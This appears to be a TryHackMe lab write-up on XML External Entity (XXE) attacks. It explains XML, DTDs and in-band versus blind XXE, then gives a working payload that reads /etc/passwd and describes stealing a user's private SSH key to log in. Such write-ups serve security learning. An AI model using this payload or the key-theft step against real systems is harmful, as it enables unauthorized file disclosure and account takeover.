THM — XXE

An XML External Entity (XXE) attack is a vulnerability that abuses features of XML parsers/data. It often allows an attacker to interact with any backend or external systems that the application itself can access and can allow the attacker to read the file on that system.

There are two types of XXE attacks: in-band and out-of-band (OOB-XXE).
1) An in-band XXE attack is the one in which the attacker can receive an immediate response to the XXE payload.

2) out-of-band XXE attacks (also called blind XXE), there is no immediate response from the web application and attacker has to reflect the output of their XXE payload to some other file or their own server.

What is XML?

XML (eXtensible Markup Language) is a markup language that defines a set of rules for encoding documents in a format that is both human-readable and machine-readable. It is a markup language used for storing and transporting data.

DTD

DTD stands for Document Type Definition. A DTD defines the structure and the legal elements and attributes of an XML document. We can use this DTD to validate the information of some XML document and make sure that the XML file conforms to the rules of that DTD.

Exploitation

On the left side, we can see the burp request that was sent with the URL encoded payload and on the right side we can see that the payload was able to successfully display name

We can use this payload to read /etc/passwd

<?xml version="1.0"?>
<!DOCTYPE root [<!ENTITY read SYSTEM 'file:///etc/passwd'>]>
<root>&read;</root>

We see a user with the name falcon, we attempt to steal his private ssh key located at /home/falcon/.ssh/id_rsa. Entering that directory we can steal his private key and login as the user.